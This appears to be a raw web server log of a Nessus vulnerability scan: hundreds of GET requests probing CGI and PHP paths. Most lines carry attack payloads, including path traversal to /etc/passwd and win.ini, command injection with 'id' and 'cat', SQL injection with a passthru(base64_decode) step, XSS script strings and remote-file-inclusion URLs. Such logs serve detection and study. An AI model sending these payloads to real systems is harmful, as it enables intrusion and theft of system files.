GET /cgi-bin/msg.txt HTTP/1.1
GET /cgi-bin/mt.cgi?__mode=logout HTTP/1.1
GET /cgi-bin/mt/ HTTP/1.1
GET /cgi-bin/myevent.php?myevent_path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/mylog.html?screen=/etc/passwd HTTP/1.1
GET /cgi-bin/myphpPageTool/doc/admin/index.php?ptinclude-http://xxxxxxxx HTTP/1.1
GET /cgi-bin/nbmember.cgi?cmd=test HTTP/1.1
GET /cgi-bin/ncbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1
GET /cgi-bin/ncbook/ncbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1
GET /cgi-bin/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=ghQMwCmebYx9uY8ft HTTP/1.1
GET /cgi-bin/neomail.pl HTTP/1.1
GET /cgi-bin/nessus%22%3e%3cscript%3ealert('django_admin_xss.nasl')%3c%2fscript%3e%2f HTTP/1.1
GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/new-visitor.inc.php?lvc_include_dir=http://xxxxxxxx HTTP/1.1
GET /cgi-bin/new_images.php?order=linpha_order_sql_injection.nasl_1410939022 HTTP/1.1
GET /cgi-bin/news.mdb HTTP/1.1
GET /cgi-bin/news.php HTTP/1.1
GET /cgi-bin/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl HTTP/1.1
GET /cgi-bin/news/index.dot?id=../../../../../../../../../../../..//etc/passwd%00.jpg HTTP/1.1
GET /cgi-bin/newsdata/data/user.idx HTTP/1.1
GET /cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/newsscript.pl?mode=admin HTTP/1.1
GET /cgi-bin/nmap.php?target=|id HTTP/1.1
GET /cgi-bin/normal_html.cgi?file=|id| HTTP/1.1
GET /cgi-bin/notify?from=nessus\
GET /cgi-bin/nph-exploitscanget.cgi?host=`id`&port=80&errchk=0&idsbypass=0 HTTP/1.1
GET /cgi-bin/nph-mr.cgi HTTP/1.1
GET /cgi-bin/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/nph-proxy.cgi HTTP/1.1
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nquser.php HTTP/1.1
GET /cgi-bin/nslookup.cgi?query=localhost%3bid&type=ANY&ns= HTTP/1.1
GET /cgi-bin/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/nx/common/cds/menu.inc.php?c_path=http://xxxxxxxx/ HTTP/1.1
GET /cgi-bin/ohelp/en_US/Content/master/webadmin/WebAdmin.html HTTP/1.1
GET /cgi-bin/op/op.Login.php?login=guest&sesstheme=default&lang=English HTTP/1.1
GET /cgi-bin/open.php HTTP/1.1
GET /cgi-bin/openwebmail.pl HTTP/1.1
GET /cgi-bin/openwebmail/ HTTP/1.1
GET /cgi-bin/ovlaunch.exe HTTP/1.1
GET /cgi-bin/p-news.php HTTP/1.1
GET /cgi-bin/pafiledb.php HTTP/1.1
GET /cgi-bin/pajax/pajax_call_dispatcher.php HTTP/1.1
GET /cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.1
GET /cgi-bin/parse_xml.cgi?action=login&filename=frameset.html|id%00| HTTP/1.1
GET /cgi-bin/password_reminder.php HTTP/1.1
GET /cgi-bin/patch/index.php HTTP/1.1
GET /cgi-bin/pdesk.cgi?lang=../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/perl.exe?-v HTTP/1.1
GET /cgi-bin/perl?-v HTTP/1.1
GET /cgi-bin/pfdispaly.cgi?../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/pfdispaly?../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/phf?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.1
GET /cgi-bin/photo.php?albumid=-860'%20UNION%20SELECT%201,concat(0x73,0x69,0x74,0x65,0x78,0x5f,0x61,0x6c,0x62,0x75,0x6d,0x69,0x64,0x5f,0x73,0x71,0x6c,0x69,0x2e,0x6e,0x61,0x73,0x6c),3,4,5,6,7,8%20--%20' HTTP/1.1
GET /cgi-bin/php-ping.php?host=test&submit=Ping!&count=1|id|| HTTP/1.1
GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.1
GET /cgi-bin/php/mytutos.php HTTP/1.1
GET /cgi-bin/phpinfo.php HTTP/1.1
GET /cgi-bin/phpnews/sendtofriend.php?mid='1' HTTP/1.1
GET /cgi-bin/phpping/index.php?pingto=www.nessus.org%20|%20dir HTTP/1.1
GET /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1410938849&lang_crm=../../../../../../../../../../../..//etc/passwd%00 HTTP/1.1
GET /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1410938849&lang_crm=../../vtigerservice.php%00 HTTP/1.1
GET /cgi-bin/phptonuke.php?filnavn=/etc/passwd HTTP/1.1
GET /cgi-bin/plog-download.php?dl_type=album&checked[]='%20UNION%20SELECT%20'plogger_checked_sql_injection.nasl'%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%20--%20 HTTP/1.1
GET /cgi-bin/plog-rss.php?level=collection&id=999%20OR%20plogger_id_sql_injection.nasl HTTP/1.1
GET /cgi-bin/plugins/preview/preview.html HTTP/1.1
GET /cgi-bin/plugins/safehtml/HTMLSax3.php?dir[plugins]=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/pm/add_ons/mail_this_entry/mail_authocheck.php?pm_path=http://xxxxxxxx./&sfx=.txt HTTP/1.1
GET /cgi-bin/pmwiki.php HTTP/1.1
GET /cgi-bin/pmwiki.php?GLOBALS[FarmD]=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/popup.php?include_path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/port.php?proto=tcp' HTTP/1.1
GET /cgi-bin/preferences.php?action=setcookie HTTP/1.1
GET /cgi-bin/print.php?what=article&id=' HTTP/1.1
GET /cgi-bin/printenv HTTP/1.1
GET /cgi-bin/printfaq.php?lng=en&pg=1 HTTP/1.1
GET /cgi-bin/processSimple.do HTTP/1.1
GET /cgi-bin/profil.php?id=1%20<scr ipt>foo</script> HTTP/1.1
GET /cgi-bin/projects_site/uploadfile.php?demoSession=1 HTTP/1.1
GET /cgi-bin/protection.php?action=logout&siteurl=/etc/passwd HTTP/1.1
GET /cgi-bin/psunami.cgi?file=|id| HTTP/1.1
GET /cgi-bin/pub/pki?cmd=serverInfo HTTP/1.1
GET /cgi-bin/pwcgi/smpwservicescgi.exe?TARGET=http://www.nessus.org HTTP/1.1
GET /cgi-bin/query.cgi HTTP/1.1
GET /cgi-bin/query?group=-- HTTP/1.1
GET /cgi-bin/query?mss=%2e%2e/config HTTP/1.1
GET /cgi-bin/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd%00html HTTP/1.1
GET /cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.1
GET /cgi-bin/readfile.tcl?file=/etc/master.passwd HTTP/1.1
GET /cgi-bin/subdomain.domain.7z HTTP/1.1
GET /cgi-bin/subdomain.domain.Z HTTP/1.1
GET /cgi-bin/subdomain.domain.bz2 HTTP/1.1
GET /cgi-bin/subdomain.domain.gz HTTP/1.1
GET /cgi-bin/subdomain.domain.jar HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.7z HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.Z HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.bz2 HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.gz HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.jar HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.rar HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.tar HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.tar.bz2 HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.tar.gz HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.tgz HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.war HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.z HTTP/1.1
GET /cgi-bin/subdomain.domain.tld.zip HTTP/1.1
GET /cgi-bin/subdomain.domain.rar HTTP/1.1
GET /cgi-bin/subdomain.domain.tar HTTP/1.1
GET /cgi-bin/subdomain.domain.tar.bz2 HTTP/1.1
GET /cgi-bin/subdomain.domain.tar.gz HTTP/1.1
GET /cgi-bin/subdomain.domain.tgz HTTP/1.1
GET /cgi-bin/subdomain.domain.war HTTP/1.1
GET /cgi-bin/subdomain.domain.z HTTP/1.1
GET /cgi-bin/subdomain.domain.zip HTTP/1.1
GET /cgi-bin/recordings/index.php HTTP/1.1
GET /cgi-bin/remindpasswd HTTP/1.1
GET /cgi-bin/remotehtmlview.php?phpAds_path=http://xxxxxxxx HTTP/1.1
GET /cgi-bin/resetpw.php?email=../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/rest/api/2.0.alpha1/serverInfo HTTP/1.1
GET /cgi-bin/rest/api/2/serverInfo HTTP/1.1
GET /cgi-bin/review.php?id=1&cat=&subcat=%22%3E%3cscript%3ealert('phpmydirectory_multiple_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1
GET /cgi-bin/roschedule.php HTTP/1.1
GET /cgi-bin/rot13sj.cgi?/etc/passwd HTTP/1.1
GET /cgi-bin/rpc.php?cmd=display_get_requesters&id=1 HTTP/1.1
GET /cgi-bin/rss.php?blogId=1&profile=../../config/config.properties.php%00 HTTP/1.1
GET /cgi-bin/s_form.cgi HTTP/1.1
GET /cgi-bin/samba/smb2www.pl HTTP/1.1
GET /cgi-bin/samples/sample_posteddata.php HTTP/1.1
GET /cgi-bin/save.php?file_save=/etc/passwd HTTP/1.1
GET /cgi-bin/sawmill6cl.exe?ho+{COMPLETE_VERSION} HTTP/1.1
GET /cgi-bin/sawmillcl.exe?ho+{COMPLETE_VERSION} HTTP/1.1
GET /cgi-bin/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini%00gwextranet_template_dir_traversal.nasl HTTP/1.1
GET /cgi-bin/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=%3C/option%3E%3C/SELECT%3E%3C?phpinfo();?%3E HTTP/1.1
GET /cgi-bin/sdbsearch.cgi?stichwort=anything HTTP/1.1
GET /cgi-bin/search HTTP/1.1
GET /cgi-bin/search.aspx HTTP/1.1
GET /cgi-bin/search.cfm HTTP/1.1
GET /cgi-bin/search.cgi HTTP/1.1
GET /cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
GET /cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
GET /cgi-bin/search.exe HTTP/1.1
GET /cgi-bin/search.jsp?q=%25%22%3cscript%3ealert(1410938809)%3c/script%3e HTTP/1.1
GET /cgi-bin/search.php HTTP/1.1
GET /cgi-bin/search.php?Submit=true&search='); HTTP/1.1
GET /cgi-bin/search.php?allwords=<br><scr ipt>foo</script>&cid=0&title=1&desc=1 HTTP/1.1
GET /cgi-bin/search.pl HTTP/1.1
GET /cgi-bin/search.pl?form=../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/search/results.stm?indexname=>\
GET /cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.1
GET /cgi-bin/search/show.pl?url=file:/etc/passwd HTTP/1.1
GET /cgi-bin/search/show.pl?url=http://www.google.com HTTP/1.1
GET /cgi-bin/search=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
GET /cgi-bin/search?q=http://www.nessus.org/ HTTP/1.1
GET /cgi-bin/secure.php?cfgProgDir=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/secure/Dashboard.jspa HTTP/1.1
GET /cgi-bin/sendcard.php?view=1&id=%27sendcard_sql.nasl HTTP/1.1
GET /cgi-bin/sendtemp.pl?templ=../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/server.pt?in_ra_groupoperator_1=and&in_hi_userid=1&in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_groupoperator_1=and&parentid=1&in_hi_req_apps=1&cached=false&control=advancedstart&in_hi_revealed_1=0&in_hi_req_page=10&in_hi_depth_1=0&in_hi_totalgroups=1&parentname=AdvancedSearch&in_ra_topoperator=and HTTP/1.1
GET /cgi-bin/server.pt?open=space&name=%22%3b%7d%3c%2fscript%3e%3cscript%3ealert('plumtree_name_xss.nasl')%3c%2fscript%3e HTTP/1.1
GET /cgi-bin/server/s3_download.php HTTP/1.1
GET /cgi-bin/services/Walrus HTTP/1.1
GET /cgi-bin/services/help/?module=horde&show=about HTTP/1.1
GET /cgi-bin/services/help/?module=horde&show=menu HTTP/1.1
GET /cgi-bin/session/login.php?dest=nessus%22%3e%3cscript%3ealert('ossim_dest_xss.nasl')%3c%2fscript%3e%3c!--%20 HTTP/1.1
GET /cgi-bin/setcookie.php?u=../../../../../../../../../../../../etc/passwd%00&plugin=pblang_mult_flaws.nasl HTTP/1.1
GET /cgi-bin/settemplate.php HTTP/1.1
GET /cgi-bin/settings/site.ini HTTP/1.1
GET /cgi-bin/setup.php HTTP/1.1
GET /cgi-bin/sgdynamo.exe?HTNAME=<scr ipt>foo</script> HTTP/1.1
GET /cgi-bin/sgdynamo.exe?HTNAME=sgdynamo.exe HTTP/1.1
GET /cgi-bin/shared/help.php?page=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/shop.plx HTTP/1.1
GET /cgi-bin/shop.plx/page=nessus1521068629 HTTP/1.1
GET /cgi-bin/shopaddtocart.asp?productid='42 HTTP/1.1
GET /cgi-bin/shopexd.asp?catalogid='42 HTTP/1.1
GET /cgi-bin/shopper.cgi?newpage=../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/shoutbox.php?conf=../ HTTP/1.1
GET /cgi-bin/shoutbox.php?conf=../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/showcat.php?cat=1' HTTP/1.1
GET /cgi-bin/showproduct.php?product=1' HTTP/1.1
GET /cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.1
GET /cgi-bin/siteframe.php?LOCAL_PATH=macros/100-siteframe.macro%00 HTTP/1.1
GET /cgi-bin/sitemap.xml HTTP/1.1
GET /cgi-bin/smb2www.pl HTTP/1.1
GET /cgi-bin/smpwservicescgi.exe HTTP/1.1
GET /cgi-bin/snpfiltered.pl?t=c&u=<scr ipt>foo</script> HTTP/1.1
GET /cgi-bin/sojourn.cgi?cat=../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/source?v=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/sources/functions.php?root_path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/spaw/dialogs/confirm.php?spaw_root=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/sql.php3?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1
GET /cgi-bin/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1
GET /cgi-bin/sql/install-0.9.7.php?p=2 HTTP/1.1
GET /cgi-bin/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/sqwebmail?redirect=%0d%0a%0d%0asqwebmail_http_splitting.nasl HTTP/1.1
GET /cgi-bin/src/login.php HTTP/1.1
GET /cgi-bin/src/redirect.php HTTP/1.1
GET /cgi-bin/starnet/addons/slideshow_full.php?album_name='1774282419 HTTP/1.1
GET /cgi-bin/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/start.action HTTP/1.1
GET /cgi-bin/status.php3 HTTP/1.1
GET /cgi-bin/store.cgi?StartID=../../../../../../../../../etc/passwd%00.html HTTP/1.1
GET /cgi-bin/store.php?crn=42'&action=show&show_products_mode=cat_click HTTP/1.1
GET /cgi-bin/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/styles.php?toroot=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/subsystems/permissions.info.php HTTP/1.1
GET /cgi-bin/sugarcrm/modules/Users/Login.php?theme=../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/superguestconfig HTTP/1.1
GET /cgi-bin/supporter/tupdate.php?groupid=change&sg=' HTTP/1.1
GET /cgi-bin/survey.inc.php?path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
GET /cgi-bin/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id HTTP/1.1
GET /cgi-bin/sysinfo/ HTTP/1.1
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test.php HTTP/1.1
GET /cgi-bin/tests/test_tools/selenium/core/SeleniumLog.html HTTP/1.1
GET /cgi-bin/texis.exe/?-dump HTTP/1.1
GET /cgi-bin/texis.exe/nessus HTTP/1.1
GET /cgi-bin/themes/program/themesettings.inc.php?themesdir=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/tiki-index.php HTTP/1.1
GET /cgi-bin/tinfo.php?id=1410939053 HTTP/1.1
GET /cgi-bin/tinybrowser/upload.php?badfiles=1><scr ipt>alert('tinybrowser_multiple_xss.nasl')</script> HTTP/1.1
GET /cgi-bin/tomcat_proxy_directory_traversal.nasl1410939029 HTTP/1.1
GET /cgi-bin/top.php?header=../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/topic.php?tid='select HTTP/1.1
GET /cgi-bin/tree.php HTTP/1.1
GET /cgi-bin/tst.bat|type%20c:\\windows\\win.ini HTTP/1.1
GET /cgi-bin/tst.bat|type%20c:\\winnt\\win.ini HTTP/1.1
GET /cgi-bin/tsweb.asp HTTP/1.1
GET /cgi-bin/tsweb/ HTTP/1.1
GET /cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/ttx.cgi HTTP/1.1
GET /cgi-bin/twiki/ HTTP/1.1
GET /cgi-bin/typo3/index.php HTTP/1.1
GET /cgi-bin/ubbthreads.php HTTP/1.1
GET /cgi-bin/update.php HTTP/1.1
GET /cgi-bin/update.php?op=info HTTP/1.1
GET /cgi-bin/upgrade/index.php HTTP/1.1
GET /cgi-bin/upgradev1.php HTTP/1.1
GET /cgi-bin/upload.cgi HTTP/1.1
GET /cgi-bin/upload/upload-submit.do HTTP/1.1
GET /cgi-bin/user.cgi?url=\
GET /cgi-bin/user.php HTTP/1.1
GET /cgi-bin/users/users.php HTTP/1.1
GET /cgi-bin/usrdetails.php?sgnuptype=csaleID<scr ipt>nessus</script> HTTP/1.1
GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/vhost.php?action=logout&time=1410938659 HTTP/1.1
GET /cgi-bin/viart_shop.xml HTTP/1.1
GET /cgi-bin/view.php?PG=foobar HTTP/1.1
GET /cgi-bin/view/System/WebHome?rev=1 HTTP/1.1
GET /cgi-bin/view/TWiki/WebHome HTTP/1.1
GET /cgi-bin/view_user.php?list=1&letter=&sort_by='select HTTP/1.1
GET /cgi-bin/viewcvs.cgi/ HTTP/1.1
GET /cgi-bin/viewcvs.cgi/?cvsroot=<scr ipt>foo</script> HTTP/1.1
GET /cgi-bin/viewpage.php?file=/etc/passwd HTTP/1.1
GET /cgi-bin/viewvc.cgi/ HTTP/1.1
GET /cgi-bin/wa.cgi?DEBUG-SHOW-VERSION HTTP/1.1
GET /cgi-bin/wa.exe?DEBUG-SHOW-VERSION HTTP/1.1
GET /cgi-bin/wa?DEBUG-SHOW-VERSION HTTP/1.1
GET /cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/wc.dll?wwMaint~EditConfig HTTP/1.1
GET /cgi-bin/webadmin.php?show=%2Fetc%2Fpasswd HTTP/1.1
GET /cgi-bin/webapp/home.html?0 HTTP/1.1
GET /cgi-bin/webappmon.exe?ins=nowait&act=natping&sel=%22255.255.255.255%20%26%20id%26%22 HTTP/1.1
GET /cgi-bin/webboard/generate.cgi HTTP/1.1
GET /cgi-bin/webc.cgi/ HTTP/1.1
GET /cgi-bin/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD HTTP/1.1
GET /cgi-bin/webdist.cgi?distloc=;id HTTP/1.1
GET /cgi-bin/webglimpse.cgi HTTP/1.1
GET /cgi-bin/webplus.exe?script=webplus_install_path.nasl HTTP/1.1
GET /cgi-bin/webplus?script=/../../../../etc/passwd HTTP/1.1
GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/webwho.pl HTTP/1.1
GET /cgi-bin/welcome.php?custom_welcome_page=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/whois.cgi?action=load&whois=%3Bid HTTP/1.1
GET /cgi-bin/whois.php?query=|id HTTP/1.1
GET /cgi-bin/whois_raw.cgi?fqdn=%0Aid HTTP/1.1
GET /cgi-bin/wihphoto/start.php HTTP/1.1
GET /cgi-bin/wiki.php/<scr ipt>foo</script> HTTP/1.1
GET /cgi-bin/wiki/edit.php?page=SandBox&suck_url=../kernel/config_inc.php&do_suck=h HTTP/1.1
GET /cgi-bin/wiki/rankings.php HTTP/1.1
GET /cgi-bin/wikka.php?wakka=HomePage/../../actions/wikkachanges HTTP/1.1
GET /cgi-bin/wizard/index.php HTTP/1.1
GET /cgi-bin/wordtrans.php?command=show_desc&advanced=1%22%3bid%3b%20true%20%22 HTTP/1.1
GET /cgi-bin/wps/wps_shop.cgi?action=showartikel&cat=nessus&catname=nessus&art=|id| HTTP/1.1
GET /cgi-bin/wps_shop.cgi?action=showartikel&cat=nessus&catname=nessus&art=|id| HTTP/1.1
GET /cgi-bin/wsasp.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /cgi-bin/wsasp.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /cgi-bin/wsisa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /cgi-bin/wsisa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /cgi-bin/wsnsa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /cgi-bin/wsnsa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /cgi-bin/wspd_cgi.sh/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /cgi-bin/wspd_cgi.sh/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /cgi-bin/www.subdomain.domain.7z HTTP/1.1
GET /cgi-bin/www.subdomain.domain.Z HTTP/1.1
GET /cgi-bin/www.subdomain.domain.bz2 HTTP/1.1
GET /cgi-bin/www.subdomain.domain.gz HTTP/1.1
GET /cgi-bin/www.subdomain.domain.jar HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.7z HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.Z HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.bz2 HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.gz HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.jar HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.rar HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.tar HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.tar.bz2 HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.tar.gz HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.tgz HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.war HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.z HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tld.zip HTTP/1.1
GET /cgi-bin/www.subdomain.domain.rar HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tar HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tar.bz2 HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tar.gz HTTP/1.1
GET /cgi-bin/www.subdomain.domain.tgz HTTP/1.1
GET /cgi-bin/www.subdomain.domain.war HTTP/1.1
GET /cgi-bin/www.subdomain.domain.z HTTP/1.1
GET /cgi-bin/www.subdomain.domain.zip HTTP/1.1
GET /cgi-bin/www/delivery/ac.php?bannerid=-1410938843+OR+1=1+--+';passthru(base64_decode($_SERVER[HTTP_NESSUS_UQ8YUS0N]));die;/* HTTP/1.1
GET /cgi-bin/www/delivery/ac.php?bannerid=-82+OR+1=1 HTTP/1.1
GET /cgi-bin/www/delivery/fc.php?MAX_type=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/wwwboard.html HTTP/1.1
GET /cgi-bin/x_news.php HTTP/1.1
GET /cgi-bin/xaradodb/server.php    ?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /cgi-bin/zenworks/jsp/fw/internal/Login.jsp HTTP/1.1
GET /cgi-bin/zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/zpanel.php?page=/etc/passwd%00 HTTP/1.1
GET /cgi-bin2/ HTTP/1.1
GET /cgi-binadmin/index.php HTTP/1.1
GET /cgi-binfaq.php?skin=../../admin/manager&tplpath=admin HTTP/1.1
GET /cgi-binmultihtml.pl?multi=/etc/passwd%00html HTTP/1.1
GET /cgi-binsearch-results.dot?search_query=nessus%22%3e%3cscript%3ealert('dotcms_search_query_xss.nasl')%3c%2fscript%3e%2f HTTP/1.1
GET /cgi-binsearch_results.dot?search_query=nessus%22%3e%3cscript%3ealert('dotcms_search_query_xss.nasl')%3c%2fscript%3e%2f HTTP/1.1
GET /cgi-csc/ HTTP/1.1
GET /cgi-isapi/ HTTP/1.1
GET /cgi-lib/ HTTP/1.1
GET /cgi-local/ HTTP/1.1
GET /cgi-local/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1
GET /cgi-public/ HTTP/1.1
GET /cgi-scripts/ HTTP/1.1
GET /cgi-shl/ HTTP/1.1
GET /cgi-shop/ HTTP/1.1
GET /cgi-sys/ HTTP/1.1
GET /cgi-sys/guestbook.cgi?user=cpanel&template=|/bin/id| HTTP/1.1
GET /cgi-sys/guestbook.cgi?user=cpanel&template=|/usr/bin/id| HTTP/1.1
GET /cgi-weddico/ HTTP/1.1
GET /cgi-win/ HTTP/1.1
GET /cgi/ HTTP/1.1
GET /cgi/tseekdir.cgi?location=/etc/passwd%00 HTTP/1.1
GET /cgi_bin/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1
GET /cgibin/ HTTP/1.1
GET /cgiforum.pl?thesection=../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgiip.exe/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /cgiip.exe/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /cgilib/ HTTP/1.1
GET /cgis/ HTTP/1.1
GET /cgiscripts/ HTTP/1.1
GET /cgiwin/ HTTP/1.1
GET /cgiwrap/cgiwrap_error_page_handling_xss.nasl HTTP/1.1
GET /chassis/config/GeneralChassisConfig.html HTTP/1.1
GET /chat.php HTTP/1.1
GET /chat/ HTTP/1.1
GET /chat/!pwds.txt HTTP/1.1
GET /chat/login.php?option=chat HTTP/1.1
GET /check_user_id.php?user_id=<scr ipt>foo</script> HTTP/1.1
GET /chora/ HTTP/1.1
GET /citrusdb/main.php HTTP/1.1
GET /clan-nic/ HTTP/1.1
GET /clan-nic/index.php?file=News&op=phpinfo HTTP/1.1
GET /clan/ HTTP/1.1
GET /clan/index.php?file=News&op=phpinfo HTTP/1.1
GET /claroline/ HTTP/1.1
GET /claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=/etc/passwd%00 HTTP/1.1
GET /class/ HTTP/1.1
GET /classes/ HTTP/1.1
GET /classes/adodbt/sql.php?classes_dir=/etc/passwd%00 HTTP/1.1
GET /classified/ HTTP/1.1
GET /classifieds/ HTTP/1.1
GET /clearspace/admin/login.jsp?url=main.jsp HTTP/1.1
GET /client/ HTTP/1.1
GET /clientaccesspolicy.xml HTTP/1.1
